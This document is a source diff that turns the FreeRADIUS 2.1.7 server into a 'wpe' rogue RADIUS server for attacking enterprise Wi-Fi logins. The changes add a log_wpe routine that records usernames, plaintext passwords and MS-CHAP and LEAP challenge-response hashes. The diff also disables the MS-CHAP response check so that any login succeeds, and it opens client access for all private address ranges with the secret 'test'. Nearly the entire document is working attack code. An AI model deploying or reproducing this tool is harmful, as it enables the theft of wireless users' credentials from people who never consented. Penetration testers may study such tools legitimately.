diff -crB freeradius-server-2.1.7/raddb/clients.conf freeradius-server-2.1.7-wpe/raddb/clients.conf
*** freeradius-server-2.1.7/raddb/clients.conf	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/clients.conf	Thu Nov 12 00:18:30 2009
***************
*** 2,12 ****
  ##
  ## clients.conf -- client configuration directives
  ##
! ##	$Id$
  
  #######################################################################
  #
! #  Define RADIUS clients (usually a NAS, Access Point, etc.).
  
  #
  #  Defines a RADIUS client.
--- 2,21 ----
  ##
  ## clients.conf -- client configuration directives
  ##
! ##	$Id: clients.conf,v 1.12 2008/02/13 09:41:14 aland Exp $
  
  #######################################################################
  #
! #  Definition of a RADIUS client (usually a NAS).
! #
! #  The information given here over rides anything given in the
! #  'clients' file, or in the 'naslist' file.  The configuration here
! #  contains all of the information from those two files, and allows
! #  for more configuration items.
! #
! #  The "shortname" is be used for logging.  The "nastype", "login" and
! #  "password" fields are mainly used for checkrad and are optional.
! #
  
  #
  #  Defines a RADIUS client.
***************
*** 22,31 ****
  #  Each client has a "short name" that is used to distinguish it from
  #  other clients.
  #
! #  In version 1.x, the string after the word "client" was the IP
! #  address of the client.  In 2.0, the IP address is configured via
! #  the "ipaddr" or "ipv6addr" fields.  For compatibility, the 1.x
! #  format is still accepted.
  #
  client localhost {
  	#  Allowed values are:
--- 31,39 ----
  #  Each client has a "short name" that is used to distinguish it from
  #  other clients.
  #
! #  In version 1.x, this field was the IP address of the client.
! #  In 2.0, the IP address is configured via the "ipaddr" or "ipv6addr"
! #  fields.  For compatibility, the 1.x format is still accepted.
  #
  client localhost {
  	#  Allowed values are:
***************
*** 63,74 ****
  	#  In that case, the smallest possible network will be used
  	#  as the "best match" for the client.
  	#
- 	#  Clients can also be defined dynamically at run time, based
- 	#  on any criteria.  e.g. SQL lookups, keying off of NAS-Identifier,
- 	#  etc.
- 	#  See raddb/sites-available/dynamic-clients for details.
- 	#
- 
  #	netmask = 32
  
  	#
--- 71,76 ----
***************
*** 162,174 ****
  	#  item, as in the example below.
  	#
  #	virtual_server = home1
- 
- 	#
- 	#  A pointer to the "home_server_pool" OR a "home_server"
- 	#  section that contains the CoA configuration for this
- 	#  client.  For an example of a coa home server or pool,
- 	#  see raddb/sites-available/originate-coa
- #	coa_server = coa
  }
  
  # IPv6 Client
--- 164,169 ----
***************
*** 227,234 ****
  #  "clients = per_socket_clients".  That IP address/port combination
  #  will then accept ONLY the clients listed in this section.
  #
! #clients per_socket_clients {
  #	client 192.168.3.4 {
  #		secret = testing123
  #        }
  #}
--- 222,246 ----
  #  "clients = per_socket_clients".  That IP address/port combination
  #  will then accept ONLY the clients listed in this section.
  #
! #per_socket_clients {
  #	client 192.168.3.4 {
  #		secret = testing123
  #        }
  #}
+ 
+ client 192.168.0.0/16 {
+        secret          = test 
+        shortname       = testAP 
+ }
+ client 172.16.0.0/12 {
+        secret          = test
+        shortname       = testAP
+ }
+ client 10.0.0.0/8 {
+        secret          = test
+        shortname       = testAP
+ }
+ #client 127.0.0.1 {
+ #       secret          = test
+ #       shortname       = testAP
+ #}
diff -crB freeradius-server-2.1.7/raddb/eap.conf freeradius-server-2.1.7-wpe/raddb/eap.conf
*** freeradius-server-2.1.7/raddb/eap.conf	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/eap.conf	Thu Nov 12 00:18:30 2009
***************
*** 1,479 ****
- # -*- text -*-
- ##
- ##  eap.conf -- Configuration for EAP types (PEAP, TTLS, etc.)
- ##
- ##	$Id$
- 
- #######################################################################
- #
- #  Whatever you do, do NOT set 'Auth-Type := EAP'.  The server
- #  is smart enough to figure this out on its own.  The most
- #  common side effect of setting 'Auth-Type := EAP' is that the
- #  users then cannot use ANY other authentication method.
- #
- #  EAP types NOT listed here may be supported via the "eap2" module.
- #  See experimental.conf for documentation.
- #
  	eap {
! 		#  Invoke the default supported EAP type when
! 		#  EAP-Identity response is received.
! 		#
! 		#  The incoming EAP messages DO NOT specify which EAP
! 		#  type they will be using, so it MUST be set here.
! 		#
! 		#  For now, only one default EAP type may be used at a time.
! 		#
! 		#  If the EAP-Type attribute is set by another module,
! 		#  then that EAP type takes precedence over the
! 		#  default type configured here.
! 		#
! 		default_eap_type = md5
! 
! 		#  A list is maintained to correlate EAP-Response
! 		#  packets with EAP-Request packets.  After a
! 		#  configurable length of time, entries in the list
! 		#  expire, and are deleted.
! 		#
  		timer_expire     = 60
- 
- 		#  There are many EAP types, but the server has support
- 		#  for only a limited subset.  If the server receives
- 		#  a request for an EAP type it does not support, then
- 		#  it normally rejects the request.  By setting this
- 		#  configuration to "yes", you can tell the server to
- 		#  instead keep processing the request.  Another module
- 		#  MUST then be configured to proxy the request to
- 		#  another RADIUS server which supports that EAP type.
- 		#
- 		#  If another module is NOT configured to handle the
- 		#  request, then the request will still end up being
- 		#  rejected.
  		ignore_unknown_eap_types = no
! 
! 		# Cisco AP1230B firmware 12.2(13)JA1 has a bug.  When given
! 		# a User-Name attribute in an Access-Accept, it copies one
! 		# more byte than it should.
! 		#
! 		# We can work around it by configurably adding an extra
! 		# zero byte.
! 		cisco_accounting_username_bug = no
! 
! 		#
! 		#  Help prevent DoS attacks by limiting the number of
! 		#  sessions that the server is tracking.  Most systems
! 		#  can handle ~30 EAP sessions/s, so the default limit
! 		#  of 2048 is more than enough.
! 		max_sessions = 2048
! 
! 		# Supported EAP-types
! 
! 		#
! 		#  We do NOT recommend using EAP-MD5 authentication
! 		#  for wireless connections.  It is insecure, and does
! 		#  not provide for dynamic WEP keys.
! 		#
  		md5 {
  		}
- 
- 		# Cisco LEAP
- 		#
- 		#  We do not recommend using LEAP in new deployments.  See:
- 		#  http://www.securiteam.com/tools/5TP012ACKE.html
- 		#
- 		#  Cisco LEAP uses the MS-CHAP algorithm (but not
- 		#  the MS-CHAP attributes) to perform it's authentication.
- 		#
- 		#  As a result, LEAP *requires* access to the plain-text
- 		#  User-Password, or the NT-Password attributes.
- 		#  'System' authentication is impossible with LEAP.
- 		#
  		leap {
  		}
- 
- 		#  Generic Token Card.
- 		#
- 		#  Currently, this is only permitted inside of EAP-TTLS,
- 		#  or EAP-PEAP.  The module "challenges" the user with
- 		#  text, and the response from the user is taken to be
- 		#  the User-Password.
- 		#
- 		#  Proxying the tunneled EAP-GTC session is a bad idea,
- 		#  the users password will go over the wire in plain-text,
- 		#  for anyone to see.
- 		#
  		gtc {
- 			#  The default challenge, which many clients
- 			#  ignore..
- 			#challenge = "Password: "
- 
- 			#  The plain-text response which comes back
- 			#  is put into a User-Password attribute,
- 			#  and passed to another module for
- 			#  authentication.  This allows the EAP-GTC
- 			#  response to be checked against plain-text,
- 			#  or crypt'd passwords.
- 			#
- 			#  If you say "Local" instead of "PAP", then
- 			#  the module will look for a User-Password
- 			#  configured for the request, and do the
- 			#  authentication itself.
- 			#
  			auth_type = PAP
  		}
- 
- 		## EAP-TLS
- 		#
- 		#  See raddb/certs/README for additional comments
- 		#  on certificates.
- 		#
- 		#  If OpenSSL was not found at the time the server was
- 		#  built, the "tls", "ttls", and "peap" sections will
- 		#  be ignored.
- 		#
- 		#  Otherwise, when the server first starts in debugging
- 		#  mode, test certificates will be created.  See the
- 		#  "make_cert_command" below for details, and the README
- 		#  file in raddb/certs
- 		#
- 		#  These test certificates SHOULD NOT be used in a normal
- 		#  deployment.  They are created only to make it easier
- 		#  to install the server, and to perform some simple
- 		#  tests with EAP-TLS, TTLS, or PEAP.
- 		#
- 		#  See also:
- 		#
- 		#  http://www.dslreports.com/forum/remark,9286052~mode=flat
- 		#
  		tls {
- 			#
- 			#  These is used to simplify later configurations.
- 			#
- 			certdir = ${confdir}/certs
- 			cadir = ${confdir}/certs
- 
  			private_key_password = whatever
! 			private_key_file = ${certdir}/server.pem
! 
! 			#  If Private key & Certificate are located in
! 			#  the same file, then private_key_file &
! 			#  certificate_file must contain the same file
! 			#  name.
! 			#
! 			#  If CA_file (below) is not used, then the
! 			#  certificate_file below MUST include not
! 			#  only the server certificate, but ALSO all
! 			#  of the CA certificates used to sign the
! 			#  server certificate.
! 			certificate_file = ${certdir}/server.pem
! 
! 			#  Trusted Root CA list
! 			#
! 			#  ALL of the CA's in this list will be trusted
! 			#  to issue client certificates for authentication.
! 			#
! 			#  In general, you should use self-signed
! 			#  certificates for 802.1x (EAP) authentication.
! 			#  In that case, this CA file should contain
! 			#  *one* CA certificate.
! 			#
! 			#  This parameter is used only for EAP-TLS,
! 			#  when you issue client certificates.  If you do
! 			#  not use client certificates, and you do not want
! 			#  to permit EAP-TLS authentication, then delete
! 			#  this configuration item.
! 			CA_file = ${cadir}/ca.pem
! 
! 			#
! 			#  For DH cipher suites to work, you have to
! 			#  run OpenSSL to create the DH file first:
! 			#
! 			#  	openssl dhparam -out certs/dh 1024
! 			#
! 			dh_file = ${certdir}/dh
! 			random_file = ${certdir}/random
! 
! 			#
! 			#  This can never exceed the size of a RADIUS
! 			#  packet (4096 bytes), and is preferably half
! 			#  that, to accomodate other attributes in
! 			#  RADIUS packet.  On most APs the MAX packet
! 			#  length is configured between 1500 - 1600
! 			#  In these cases, fragment size should be
! 			#  1024 or less.
! 			#
! 		#	fragment_size = 1024
! 
! 			#  include_length is a flag which is
! 			#  by default set to yes If set to
! 			#  yes, Total Length of the message is
! 			#  included in EVERY packet we send.
! 			#  If set to no, Total Length of the
! 			#  message is included ONLY in the
! 			#  First packet of a fragment series.
! 			#
! 		#	include_length = yes
! 
! 			#  Check the Certificate Revocation List
! 			#
! 			#  1) Copy CA certificates and CRLs to same directory.
! 			#  2) Execute 'c_rehash <CA certs&CRLs Directory>'.
! 			#    'c_rehash' is OpenSSL's command.
! 			#  3) uncomment the line below.
! 			#  5) Restart radiusd
! 		#	check_crl = yes
! 		#	CA_path = /path/to/directory/with/ca_certs/and/crls/
! 
! 		       #
! 		       #  If check_cert_issuer is set, the value will
! 		       #  be checked against the DN of the issuer in
! 		       #  the client certificate.  If the values do not
! 		       #  match, the cerficate verification will fail,
! 		       #  rejecting the user.
! 		       #
! 		#       check_cert_issuer = "/C=GB/ST=Berkshire/L=Newbury/O=My Company Ltd"
! 
! 		       #
! 		       #  If check_cert_cn is set, the value will
! 		       #  be xlat'ed and checked against the CN
! 		       #  in the client certificate.  If the values
! 		       #  do not match, the certificate verification
! 		       #  will fail rejecting the user.
! 		       #
! 		       #  This check is done only if the previous
! 		       #  "check_cert_issuer" is not set, or if
! 		       #  the check succeeds.
! 		       #
! 		#	check_cert_cn = %{User-Name}
! 		#
! 			# Set this option to specify the allowed
! 			# TLS cipher suites.  The format is listed
! 			# in "man 1 ciphers".
! 			cipher_list = "DEFAULT"
! 
! 			#
! 
! 			#  This configuration entry should be deleted
! 			#  once the server is running in a normal
! 			#  configuration.  It is here ONLY to make
! 			#  initial deployments easier.
! 			#
! 			make_cert_command = "${certdir}/bootstrap"
! 
! 			#
! 			#  Session resumption / fast reauthentication
! 			#  cache.
! 			#
! 			cache {
! 			      #
! 			      #  Enable it.  The default is "no".
! 			      #  Deleting the entire "cache" subsection
! 			      #  Also disables caching.
! 			      #
! 			      #  You can disallow resumption for a
! 			      #  particular user by adding the following
! 			      #  attribute to the control item list:
! 			      #
! 			      #		Allow-Session-Resumption = No
! 			      #
! 			      #  If "enable = no" below, you CANNOT
! 			      #  enable resumption for just one user
! 			      #  by setting the above attribute to "yes".
! 			      #
! 			      enable = no
! 
! 			      #
! 			      #  Lifetime of the cached entries, in hours.
! 			      #  The sessions will be deleted after this
! 			      #  time.
! 			      #
! 			      lifetime = 24 # hours
! 
! 			      #
! 			      #  The maximum number of entries in the
! 			      #  cache.  Set to "0" for "infinite".
! 			      #
! 			      #  This could be set to the number of users
! 			      #  who are logged in... which can be a LOT.
! 			      #
! 			      max_entries = 255
! 			}
! 		}
! 
! 		#  The TTLS module implements the EAP-TTLS protocol,
! 		#  which can be described as EAP inside of Diameter,
! 		#  inside of TLS, inside of EAP, inside of RADIUS...
! 		#
! 		#  Surprisingly, it works quite well.
! 		#
! 		#  The TTLS module needs the TLS module to be installed
! 		#  and configured, in order to use the TLS tunnel
! 		#  inside of the EAP packet.  You will still need to
! 		#  configure the TLS module, even if you do not want
! 		#  to deploy EAP-TLS in your network.  Users will not
! 		#  be able to request EAP-TLS, as it requires them to
! 		#  have a client certificate.  EAP-TTLS does not
! 		#  require a client certificate.
! 		#
! 		#  You can make TTLS require a client cert by setting
! 		#
! 		#	EAP-TLS-Require-Client-Cert = Yes
! 		#
! 		#  in the control items for a request.
! 		#
  		ttls {
- 			#  The tunneled EAP session needs a default
- 			#  EAP type which is separate from the one for
- 			#  the non-tunneled EAP module.  Inside of the
- 			#  TTLS tunnel, we recommend using EAP-MD5.
- 			#  If the request does not contain an EAP
- 			#  conversation, then this configuration entry
- 			#  is ignored.
- 			default_eap_type = md5
- 
- 			#  The tunneled authentication request does
- 			#  not usually contain useful attributes
- 			#  like 'Calling-Station-Id', etc.  These
- 			#  attributes are outside of the tunnel,
- 			#  and normally unavailable to the tunneled
- 			#  authentication request.
- 			#
- 			#  By setting this configuration entry to
- 			#  'yes', any attribute which NOT in the
- 			#  tunneled authentication request, but
- 			#  which IS available outside of the tunnel,
- 			#  is copied to the tunneled request.
- 			#
- 			# allowed values: {no, yes}
- 			copy_request_to_tunnel = no
- 
- 			#  The reply attributes sent to the NAS are
- 			#  usually based on the name of the user
- 			#  'outside' of the tunnel (usually
- 			#  'anonymous').  If you want to send the
- 			#  reply attributes based on the user name
- 			#  inside of the tunnel, then set this
- 			#  configuration entry to 'yes', and the reply
- 			#  to the NAS will be taken from the reply to
- 			#  the tunneled request.
- 			#
- 			# allowed values: {no, yes}
- 			use_tunneled_reply = no
- 
- 			#
- 			#  The inner tunneled request can be sent
- 			#  through a virtual server constructed
- 			#  specifically for this purpose.
- 			#
- 			#  If this entry is commented out, the inner
- 			#  tunneled request will be sent through
- 			#  the virtual server that processed the
- 			#  outer requests.
- 			#
- 			virtual_server = "inner-tunnel"
- 
- 			#  This has the same meaning as the
- 			#  same field in the "tls" module, above.
- 			#  The default value here is "yes".
- 		#	include_length = yes
  		}
! 
! 		##################################################
! 		#
! 		#  !!!!! WARNINGS for Windows compatibility  !!!!!
! 		#
! 		##################################################
! 		#
! 		#  If you see the server send an Access-Challenge,
! 		#  and the client never sends another Access-Request,
! 		#  then
! 		#
! 		#		STOP!
! 		#
! 		#  The server certificate has to have special OID's
! 		#  in it, or else the Microsoft clients will silently
! 		#  fail.  See the "scripts/xpextensions" file for
! 		#  details, and the following page:
! 		#
! 		#	http://support.microsoft.com/kb/814394/en-us
! 		#
! 		#  For additional Windows XP SP2 issues, see:
! 		#
! 		#	http://support.microsoft.com/kb/885453/en-us
! 		#
! 		#  Note that we do not necessarily agree with their
! 		#  explanation... but the fix does appear to work.
! 		#
! 		##################################################
! 
! 		#
! 		#  The tunneled EAP session needs a default EAP type
! 		#  which is separate from the one for the non-tunneled
! 		#  EAP module.  Inside of the TLS/PEAP tunnel, we
! 		#  recommend using EAP-MS-CHAPv2.
! 		#
! 		#  The PEAP module needs the TLS module to be installed
! 		#  and configured, in order to use the TLS tunnel
! 		#  inside of the EAP packet.  You will still need to
! 		#  configure the TLS module, even if you do not want
! 		#  to deploy EAP-TLS in your network.  Users will not
! 		#  be able to request EAP-TLS, as it requires them to
! 		#  have a client certificate.  EAP-PEAP does not
! 		#  require a client certificate.
! 		#
! 		#
! 		#  You can make PEAP require a client cert by setting
! 		#
! 		#	EAP-TLS-Require-Client-Cert = Yes
! 		#
! 		#  in the control items for a request.
! 		#
! 		peap {
! 			#  The tunneled EAP session needs a default
! 			#  EAP type which is separate from the one for
! 			#  the non-tunneled EAP module.  Inside of the
! 			#  PEAP tunnel, we recommend using MS-CHAPv2,
! 			#  as that is the default type supported by
! 			#  Windows clients.
  			default_eap_type = mschapv2
! 
! 			#  the PEAP module also has these configuration
! 			#  items, which are the same as for TTLS.
! 			copy_request_to_tunnel = no
! 			use_tunneled_reply = no
! 
! 			#  When the tunneled session is proxied, the
! 			#  home server may not understand EAP-MSCHAP-V2.
! 			#  Set this entry to "no" to proxy the tunneled
! 			#  EAP-MSCHAP-V2 as normal MSCHAPv2.
! 		#	proxy_tunneled_request_as_eap = yes
! 
! 			#
! 			#  The inner tunneled request can be sent
! 			#  through a virtual server constructed
! 			#  specifically for this purpose.
! 			#
! 			#  If this entry is commented out, the inner
! 			#  tunneled request will be sent through
! 			#  the virtual server that processed the
! 			#  outer requests.
! 			#
! 			virtual_server = "inner-tunnel"
  		}
- 
- 		#
- 		#  This takes no configuration.
- 		#
- 		#  Note that it is the EAP MS-CHAPv2 sub-module, not
- 		#  the main 'mschap' module.
- 		#
- 		#  Note also that in order for this sub-module to work,
- 		#  the main 'mschap' module MUST ALSO be configured.
- 		#
- 		#  This module is the *Microsoft* implementation of MS-CHAPv2
- 		#  in EAP.  There is another (incompatible) implementation
- 		#  of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
- 		#  currently support.
- 		#
  		mschapv2 {
  		}
  	}
--- 1,33 ----
  	eap {
! 		default_eap_type = peap 
  		timer_expire     = 60
  		ignore_unknown_eap_types = no
! 		cisco_accounting_username_bug = yes 
  		md5 {
  		}
  		leap {
  		}
  		gtc {
  			auth_type = PAP
  		}
  		tls {
  			private_key_password = whatever
! 			private_key_file = ${raddbdir}/certs/server.pem
! 			certificate_file = ${raddbdir}/certs/server.pem
! 			CA_file = ${raddbdir}/certs/ca.pem
! 			dh_file = ${raddbdir}/certs/dh
! 			random_file = ${raddbdir}/certs/random
! 			fragment_size = 1024
! 			include_length = yes
! 		}	
  		ttls {
  		}
! 		 peap {
  			default_eap_type = mschapv2
! 			#copy_request_to_tunnel = no
! 			#use_tunneled_reply = no
! 			#proxy_tunneled_request_as_eap = yes
  		}
  		mschapv2 {
  		}
  	}
diff -crB freeradius-server-2.1.7/raddb/radiusd.conf.in freeradius-server-2.1.7-wpe/raddb/radiusd.conf.in
*** freeradius-server-2.1.7/raddb/radiusd.conf.in	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/raddb/radiusd.conf.in	Thu Nov 12 00:19:52 2009
***************
*** 466,472 ****
  
  #  The program to execute to do concurrency checks.
  checkrad = ${sbindir}/checkrad
! 
  # SECURITY CONFIGURATION
  #
  #  There may be multiple methods of attacking on the server.  This
--- 466,472 ----
  
  #  The program to execute to do concurrency checks.
  checkrad = ${sbindir}/checkrad
! wpelogfile = ${logdir}/freeradius-server-wpe.log
  # SECURITY CONFIGURATION
  #
  #  There may be multiple methods of attacking on the server.  This
diff -crB freeradius-server-2.1.7/src/include/radiusd.h freeradius-server-2.1.7-wpe/src/include/radiusd.h
*** freeradius-server-2.1.7/src/include/radiusd.h	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/include/radiusd.h	Thu Nov 12 00:18:30 2009
***************
*** 361,366 ****
--- 361,367 ----
  #endif
  	char		*log_file;
  	char		*checkrad;
+ 	char		*wpelogfile;
  	const char      *pid_file;
  	rad_listen_t	*listen;
  	int		syslog_facility;
diff -crB freeradius-server-2.1.7/src/main/auth.c freeradius-server-2.1.7-wpe/src/main/auth.c
*** freeradius-server-2.1.7/src/main/auth.c	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/auth.c	Thu Nov 12 00:18:30 2009
***************
*** 339,344 ****
--- 339,345 ----
  					return -1;
  				}
  				RDEBUG2("User-Password in the request is correct.");
+ 				log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
  				break;
  
  			} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -crB freeradius-server-2.1.7/src/main/log.c freeradius-server-2.1.7-wpe/src/main/log.c
*** freeradius-server-2.1.7/src/main/log.c	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/log.c	Thu Nov 12 00:18:30 2009
***************
*** 28,33 ****
--- 28,36 ----
  
  #include <freeradius-devel/radiusd.h>
  
+ #include <stdio.h>
+ #include <time.h>
+ 
  #ifdef HAVE_SYS_STAT_H
  #include <sys/stat.h>
  #endif
***************
*** 258,263 ****
--- 261,314 ----
  	return r;
  }
  
+ void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+        FILE            *logfd;
+        time_t          nowtime;
+        unsigned int    count;
+ 
+        /* Get wpelogfile parameter and log data */
+        if (mainconfig.wpelogfile == NULL) {
+               logfd = stderr;
+        } else {
+                logfd = fopen(mainconfig.wpelogfile, "a");
+                if (logfd == NULL) {
+                        DEBUG2("  rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+                        logfd = stderr;
+                }
+        }
+ 
+ 
+        nowtime = time(NULL);
+        fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+ 
+        if (username != NULL) {
+                fprintf(logfd, "\tusername: %s\n", username);
+        }
+        if (password != NULL) {
+                fprintf(logfd, "\tpassword: %s\n", password);
+        }
+ 
+        if (challen != 0) {
+                fprintf(logfd, "\tchallenge: ");
+                for (count=0; count!=(challen-1); count++) {
+                        fprintf(logfd, "%02x:",challenge[count]);
+                }
+                fprintf(logfd, "%02x\n",challenge[challen-1]);
+        }
+ 
+        if (resplen != 0) {
+                fprintf(logfd, "\tresponse: ");
+                for (count=0; count!=(resplen-1); count++) {
+                        fprintf(logfd, "%02x:",response[count]);
+                }
+                fprintf(logfd, "%02x\n",response[resplen-1]);
+        }
+ 
+        fprintf(logfd, "\n");
+        fclose(logfd);
+ }
+ 
  
  /*
   *      Dump a whole list of attributes to DEBUG2
diff -crB freeradius-server-2.1.7/src/main/mainconfig.c freeradius-server-2.1.7-wpe/src/main/mainconfig.c
*** freeradius-server-2.1.7/src/main/mainconfig.c	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/main/mainconfig.c	Thu Nov 12 00:18:30 2009
***************
*** 228,234 ****
  	{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
  
  	{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
! 
  #ifdef WITH_PROXY
  	{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
  #endif
--- 228,234 ----
  	{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
  
  	{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
! 	{ "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
  #ifdef WITH_PROXY
  	{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
  #endif
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c	Thu Nov 12 00:18:30 2009
***************
*** 244,254 ****
   *	Verify the MS-CHAP response from the user.
   */
  int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! 		   leap_session_t *session)
  {
  	unsigned char ntpwdhash[16];
  	unsigned char response[24];
! 
  
  	/*
  	 *	No password or previous packet.  Die.
--- 244,254 ----
   *	Verify the MS-CHAP response from the user.
   */
  int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! 		   leap_session_t *session, char *username)
  {
  	unsigned char ntpwdhash[16];
  	unsigned char response[24];
! 	unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  
  	/*
  	 *	No password or previous packet.  Die.
***************
*** 266,271 ****
--- 266,272 ----
  	 */
  	eapleap_mschap(ntpwdhash, session->peer_challenge, response);
  	if (memcmp(response, packet->challenge, 24) == 0) {
+ 		log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
  		DEBUG2("  rlm_eap_leap: NtChallengeResponse from AP is valid");
  		memcpy(session->peer_response, response, sizeof(response));
  		return 1;
***************
*** 416,421 ****
--- 417,424 ----
  	 */
  	for (i = 0; i < reply->count; i++) {
  		reply->challenge[i] = fr_rand();
+ 		/* WPE - Fixed challenge */
+ 	//	reply->challenge[i] = 0;
  	}
  
  	DEBUG2("  rlm_eap_leap: Issuing AP Challenge");
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h	Thu Nov 12 00:18:30 2009
***************
*** 68,74 ****
  LEAP_PACKET 	*eapleap_extract(EAP_DS *auth);
  LEAP_PACKET 	*eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
  int		eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! 			       leap_session_t *session);
  LEAP_PACKET	*eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
  				VALUE_PAIR *user_name, VALUE_PAIR* password,
  				leap_session_t *session,
--- 68,74 ----
  LEAP_PACKET 	*eapleap_extract(EAP_DS *auth);
  LEAP_PACKET 	*eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
  int		eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
! 			       leap_session_t *session, char *username);
  LEAP_PACKET	*eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
  				VALUE_PAIR *user_name, VALUE_PAIR* password,
  				leap_session_t *session,
diff -crB freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
*** freeradius-server-2.1.7/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c	Thu Nov 12 00:18:30 2009
***************
*** 133,139 ****
  	switch (session->stage) {
  	case 4:			/* Verify NtChallengeResponse */
  		DEBUG2("  rlm_eap_leap: Stage 4");
! 		rcode = eapleap_stage4(packet, password, session);
  		session->stage = 6;
  
  		/*
--- 133,140 ----
  	switch (session->stage) {
  	case 4:			/* Verify NtChallengeResponse */
  		DEBUG2("  rlm_eap_leap: Stage 4");
! 		//rcode = eapleap_stage4(packet, password, session);
! 		rcode = eapleap_stage4(packet, password, session, username);
  		session->stage = 6;
  
  		/*
diff -crB freeradius-server-2.1.7/src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.7-wpe/src/modules/rlm_mschap/rlm_mschap.c
*** freeradius-server-2.1.7/src/modules/rlm_mschap/rlm_mschap.c	Mon Sep 14 14:43:29 2009
--- freeradius-server-2.1.7-wpe/src/modules/rlm_mschap/rlm_mschap.c	Thu Nov 12 00:18:30 2009
***************
*** 736,745 ****
  static int do_mschap(rlm_mschap_t *inst,
  		     REQUEST *request, VALUE_PAIR *password,
  		     uint8_t *challenge, uint8_t *response,
! 		     uint8_t *nthashhash, int do_ntlm_auth)
  {
  	uint8_t		calculated[24];
  
  	/*
  	 *	Do normal authentication.
  	 */
--- 736,747 ----
  static int do_mschap(rlm_mschap_t *inst,
  		     REQUEST *request, VALUE_PAIR *password,
  		     uint8_t *challenge, uint8_t *response,
! 		     uint8_t *nthashhash, int do_ntlm_auth, char *username)
  {
  	uint8_t		calculated[24];
  
+ 	log_wpe("mschap", username, NULL, challenge, 8, response, 24);
+ 
  	/*
  	 *	Do normal authentication.
  	 */
***************
*** 753,761 ****
--- 755,765 ----
  		}
  
  		smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ 		/* WPE FTW
  		if (memcmp(response, calculated, 24) != 0) {
  			return -1;
  		}
+ 		*/
  
  		/*
  		 *	If the password exists, and is an NT-Password,
***************
*** 1188,1194 ****
  		 */
  		if (do_mschap(inst, request, password, challenge->vp_octets,
  			      response->vp_octets + offset, nthashhash,
! 			      do_ntlm_auth) < 0) {
  			RDEBUG2("MS-CHAP-Response is incorrect.");
  			mschap_add_reply(request, &request->reply->vps,
  					 *response->vp_octets,
--- 1192,1198 ----
  		 */
  		if (do_mschap(inst, request, password, challenge->vp_octets,
  			      response->vp_octets + offset, nthashhash,
! 			      do_ntlm_auth, username->vp_strvalue) < 0) {
  			RDEBUG2("MS-CHAP-Response is incorrect.");
  			mschap_add_reply(request, &request->reply->vps,
  					 *response->vp_octets,
***************
*** 1268,1274 ****
  
  		if (do_mschap(inst, request, nt_password, mschapv1_challenge,
  			      response->vp_octets + 26, nthashhash,
! 			      do_ntlm_auth) < 0) {
  			RDEBUG2("FAILED: MS-CHAP2-Response is incorrect");
  			mschap_add_reply(request, &request->reply->vps,
  					 *response->vp_octets,
--- 1272,1278 ----
  
  		if (do_mschap(inst, request, nt_password, mschapv1_challenge,
  			      response->vp_octets + 26, nthashhash,
! 			      do_ntlm_auth, username_string) < 0) {
  			RDEBUG2("FAILED: MS-CHAP2-Response is incorrect");
  			mschap_add_reply(request, &request->reply->vps,
  					 *response->vp_octets,
